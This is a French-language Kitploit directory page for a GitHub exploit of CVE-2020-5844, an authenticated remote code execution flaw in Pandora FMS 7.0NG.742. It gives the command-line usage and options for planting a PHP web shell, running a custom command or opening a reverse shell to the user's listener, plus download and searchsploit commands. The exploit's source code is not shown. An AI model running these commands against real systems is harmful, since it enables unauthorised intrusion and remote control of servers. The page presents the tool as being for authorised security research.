Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2020-5844 — Exploit pour CVE-2020-5844 (Pandora FMS v7.0NG.742) - Exécution de code à distance | Kitploit
Outils/GitHubGitHub/unicordev/exploit-cve-2020-5844
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubunicordev/exploit-cve-2020-5844

exploit-CVE-2020-5844

Exploit pour CVE-2020-5844 (Pandora FMS v7.0NG.742) - Exécution de code à distance

Voir le dépôt
71il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Exploit pour CVE-2020-5844 (Pandora FMS v7.0NG.742) - Exécution de code à distance

GitHub CVE Cover

Vous aimez ce dépôt ? Donnez-nous une ⭐ !

Pour des fins éducatives et de recherche en sécurité autorisées uniquement.

Auteur de l'exploit

@UNICORDev par (@NicPWNs et @Dev-Yeoj)

Description de la vulnérabilité

index.php?sec=godmode/extensions&sec2=extensions/files_repo dans Pandora FMS v7.0 NG permet aux administrateurs authentifiés de télécharger des scripts PHP malveillants et de les exécuter via le décodage base64 de l'emplacement du fichier. Cela affecte v7.0NG.742_FIX_PERL2020.

Description de l'exploit

Utilisez cet exploit pour une exécution de code à distance sur les versions vulnérables de Pandora FMS. Nécessite une adresse IP et un port cibles. Nécessite un nom d'utilisateur/mot de passe valide ou une authentification par cookie PHPSESSID valide. Exécutez en mode par défaut pour télécharger un shell web PHP basique. Exécutez en mode commande personnalisée pour exécuter une commande personnalisée sur la cible. Exécutez en mode shell inverse pour recevoir un shell inverse de la cible sur un écouteur que vous configurez. Exécutez en mode shell web personnalisé pour modifier le nom du fichier du shell web PHP.

Utilisation

root@kitploit:~
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
  python3 exploit-CVE-2020-5844.py -h

Options

root@kitploit:~
  -t    Target host and port. Provide target IP address and port.
  -u    Target username and password. Provide username and password to log in to Pandora FMS.
  -p    Target valid PHP session ID. No username or password needed. (Optional)
  -s    Reverse shell mode. Provide local IP address and port. (Optional)
  -c    Custom command mode. Provide command to execute. (Optional)
  -w    Web shell custom mode. Provide custom PHP file name. (Optional)
  -h    Show this help menu.

Téléchargement

Télécharger exploit-CVE-2020-5844.py depuis GitHub

Télécharger exploit-CVE-2020-5844.py depuis ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50961

S'applique à

Pandora FMS v7.0NG.742

Prérequis de l'exploit

  • python3
  • python3:requests

Démonstrations

Mode par défaut avec nom d'utilisateur et mot de passe

default

Mode par défaut avec PHPSESSID

default_sess

Mode commande personnalisée

command

Mode shell inverse

shell

Mode nom de shell web personnalisé

web

Crédits

  • https://nvd.nist.gov/vuln/detail/CVE-2020-5844
  • https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
  • https://app.hackthebox.com/machines/Pandora
  • https://github.com/TheCyberGeek/CVE-2020-5844
  • https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
  • https://www.exploit-db.com/exploits/50961
Télécharger l’outil